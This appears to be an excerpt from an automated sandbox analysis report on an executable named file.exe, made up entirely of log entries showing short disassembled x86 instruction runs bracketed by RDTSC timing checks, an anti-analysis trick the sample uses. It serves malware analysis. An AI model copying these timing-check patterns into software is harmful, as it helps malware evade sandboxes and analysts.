                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E51C5 second address: 13E51CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E7FC0 second address: 13E7FD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2A68BE4F53h 0x00000009 pop edi 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E7FD8 second address: 13E7FEE instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jnc 00007F2A68BD69D8h 0x0000000f pushad 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E7FEE second address: 13E800D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2A68BE4F59h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E85AA second address: 13E85AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E85AE second address: 13E8617 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F2A68BE4F4Eh 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push ecx 0x00000014 call 00007F2A68BE4F48h 0x00000019 pop ecx 0x0000001a mov dword ptr [esp+04h], ecx 0x0000001e add dword ptr [esp+04h], 0000001Dh 0x00000026 inc ecx 0x00000027 push ecx 0x00000028 ret 0x00000029 pop ecx 0x0000002a ret 0x0000002b push 00000000h 0x0000002d jmp 00007F2A68BE4F4Ch 0x00000032 xchg eax, esi 0x00000033 pushad 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007F2A68BE4F58h 0x0000003b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E8617 second address: 13E861B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E861B second address: 13E8629 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnl 00007F2A68BE4F46h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13EAB80 second address: 13EAB84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13EBBD2 second address: 13EBBD8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13EBBD8 second address: 13EBBEA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F2A68BD69DDh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13EAD50 second address: 13EAD69 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F2A68BE4F46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jbe 00007F2A68BE4F4Ch 0x00000013 jg 00007F2A68BE4F46h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13ECE54 second address: 13ECE58 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13ECE58 second address: 13ECE5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13ECE5E second address: 13ECE65 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13ECE65 second address: 13ECE72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13EEE8C second address: 13EEEA7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A68BD69E3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13EEEA7 second address: 13EEEAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13EFDAB second address: 13EFE2B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 jc 00007F2A68BD69DCh 0x0000000d mov edi, dword ptr [ebp+122D34B0h] 0x00000013 adc edi, 53BF1DCBh 0x00000019 push 00000000h 0x0000001b cld 0x0000001c push 00000000h 0x0000001e push 00000000h 0x00000020 push ebx 0x00000021 call 00007F2A68BD69D8h 0x00000026 pop ebx 0x00000027 mov dword ptr [esp+04h], ebx 0x0000002b add dword ptr [esp+04h], 00000014h 0x00000033 inc ebx 0x00000034 push ebx 0x00000035 ret 0x00000036 pop ebx 0x00000037 ret 0x00000038 jnl 00007F2A68BD6A00h 0x0000003e mov bx, 2C13h 0x00000042 push eax 0x00000043 pushad 0x00000044 jp 00007F2A68BD69DCh 0x0000004a push eax 0x0000004b push edx 0x0000004c push eax 0x0000004d push edx 0x0000004e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13EFE2B second address: 13EFE2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F1D93 second address: 13F1D99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F2DAC second address: 13F2DBA instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F2A68BE4F46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13EFF79 second address: 13EFF7E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F4094 second address: 13F4098 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F4DC0 second address: 13F4E16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 nop 0x00000005 pushad 0x00000006 mov dword ptr [ebp+122D1853h], ebx 0x0000000c or bl, FFFFFFB2h 0x0000000f popad 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push ecx 0x00000015 call 00007F2A68BD69D8h 0x0000001a pop ecx 0x0000001b mov dword ptr [esp+04h], ecx 0x0000001f add dword ptr [esp+04h], 0000001Ch 0x00000027 inc ecx 0x00000028 push ecx 0x00000029 ret 0x0000002a pop ecx 0x0000002b ret 0x0000002c push 00000000h 0x0000002e pushad 0x0000002f add dword ptr [ebp+122D3061h], ecx 0x00000035 or eax, dword ptr [ebp+122D3795h] 0x0000003b popad 0x0000003c mov ebx, dword ptr [ebp+122D3619h] 0x00000042 xchg eax, esi 0x00000043 jl 00007F2A68BD69EAh 0x00000049 pushad 0x0000004a push eax 0x0000004b push edx 0x0000004c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F4098 second address: 13F409D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F4E16 second address: 13F4E3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2A68BD69DCh 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F2A68BD69E2h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F4E3D second address: 13F4E41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F4E41 second address: 13F4E5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F2A68BD69E4h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F5E73 second address: 13F5E78 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F4FC9 second address: 13F4FD3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F2A68BD69D6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F4FD3 second address: 13F503F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov edi, eax 0x0000000d push dword ptr fs:[00000000h] 0x00000014 movsx edi, cx 0x00000017 mov dword ptr fs:[00000000h], esp 0x0000001e mov dword ptr [ebp+122D28FDh], ebx 0x00000024 mov eax, dword ptr [ebp+122D0E5Dh] 0x0000002a ja 00007F2A68BE4F4Bh 0x00000030 push FFFFFFFFh 0x00000032 push 00000000h 0x00000034 push edx 0x00000035 call 00007F2A68BE4F48h 0x0000003a pop edx 0x0000003b mov dword ptr [esp+04h], edx 0x0000003f add dword ptr [esp+04h], 00000018h 0x00000047 inc edx 0x00000048 push edx 0x00000049 ret 0x0000004a pop edx 0x0000004b ret 0x0000004c mov edi, dword ptr [ebp+122D3639h] 0x00000052 nop 0x00000053 je 00007F2A68BE4F54h 0x00000059 push eax 0x0000005a push edx 0x0000005b jp 00007F2A68BE4F46h 0x00000061 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F503F second address: 13F504A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edi 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139CA2D second address: 139CA31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140059B second address: 14005AB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnc 00007F2A68BD69D6h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14005AB second address: 14005AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FFD2A second address: 13FFD30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FFD30 second address: 13FFD5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F2A68BE4F46h 0x0000000a popad 0x0000000b jnl 00007F2A68BE4F4Ah 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F2A68BE4F55h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FFD5C second address: 13FFD60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1403BFD second address: 1403C23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov eax, dword ptr [eax] 0x00000009 jnc 00007F2A68BE4F54h 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1403C23 second address: 1403C27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1403C27 second address: 1403C30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1403D6B second address: 1403D96 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jmp 00007F2A68BD69DAh 0x00000010 mov eax, dword ptr [eax] 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F2A68BD69E2h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140B011 second address: 140B018 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140B310 second address: 140B318 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140B318 second address: 140B31C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140B31C second address: 140B332 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 je 00007F2A68BD69D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jg 00007F2A68BD69DEh 0x00000012 push esi 0x00000013 pop esi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140B332 second address: 140B341 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 jne 00007F2A68BE4F46h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140B4C4 second address: 140B4C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140B643 second address: 140B654 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F2A68BE4F4Ch 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140B654 second address: 140B65F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 pop eax 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 pop ecx 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140B65F second address: 140B665 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140B8EB second address: 140B8F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140B8F1 second address: 140B8F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140BA6C second address: 140BA76 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F2A68BD69DCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140BA76 second address: 140BA92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F2A68BE4F52h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140BA92 second address: 140BA96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140BA96 second address: 140BAAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2A68BE4F50h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140BAAC second address: 140BAB1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141227C second address: 1412280 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1412280 second address: 141228E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push edx 0x0000000a pop edx 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141228E second address: 14122B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007F2A68BE4F46h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F2A68BE4F57h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14122B3 second address: 14122B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1410D01 second address: 1410D05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1410D05 second address: 1410D3B instructions: 0x00000000 rdtsc 0x00000002 jg 00007F2A68BD69D6h 0x00000008 jmp 00007F2A68BD69E0h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 je 00007F2A68BD69D6h 0x00000016 js 00007F2A68BD69D6h 0x0000001c jl 00007F2A68BD69D6h 0x00000022 push ecx 0x00000023 pop ecx 0x00000024 popad 0x00000025 push eax 0x00000026 push edx 0x00000027 push ecx 0x00000028 pop ecx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1410D3B second address: 1410D3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1410E89 second address: 1410E95 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F2A68BD69D6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141100A second address: 141100F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141100F second address: 1411023 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F2A68BD69D6h 0x0000000a pop esi 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1411023 second address: 1411052 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F2A68BE4F52h 0x0000000b jmp 00007F2A68BE4F54h 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141130C second address: 1411312 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1411312 second address: 141131C instructions: 0x00000000 rdtsc 0x00000002 je 00007F2A68BE4F46h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141131C second address: 1411326 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1411326 second address: 141132A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1411496 second address: 141149D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141179A second address: 14117B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 je 00007F2A68BE4F4Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d js 00007F2A68BE4F46h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14117B5 second address: 14117B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1411A1C second address: 1411A26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1411B52 second address: 1411B58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1411B58 second address: 1411B76 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007F2A68BE4F58h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1411B76 second address: 1411B95 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A68BD69DAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push edi 0x0000000b jl 00007F2A68BD69D6h 0x00000011 pop edi 0x00000012 jo 00007F2A68BD69DEh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C03B7 second address: 13C03BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C03BB second address: 13C03C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14109DE second address: 14109F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A68BE4F4Dh 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14109F4 second address: 1410A09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F2A68BD69D6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jno 00007F2A68BD69D6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1410A09 second address: 1410A0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E00C3 second address: 13E010B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jg 00007F2A68BD69D6h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d sub dh, 0000001Bh 0x00000010 lea eax, dword ptr [ebp+124A1E53h] 0x00000016 push 00000000h 0x00000018 push eax 0x00000019 call 00007F2A68BD69D8h 0x0000001e pop eax 0x0000001f mov dword ptr [esp+04h], eax 0x00000023 add dword ptr [esp+04h], 0000001Ah 0x0000002b inc eax 0x0000002c push eax 0x0000002d ret 0x0000002e pop eax 0x0000002f ret 0x00000030 mov edi, edx 0x00000032 nop 0x00000033 push ecx 0x00000034 pushad 0x00000035 pushad 0x00000036 popad 0x00000037 push ecx 0x00000038 pop ecx 0x00000039 popad 0x0000003a pop ecx 0x0000003b push eax 0x0000003c push ebx 0x0000003d pushad 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E13E8 second address: 13E13ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E13ED second address: 13E13FF instructions: 0x00000000 rdtsc 0x00000002 jl 00007F2A68BD69D8h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E13FF second address: 13E1403 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
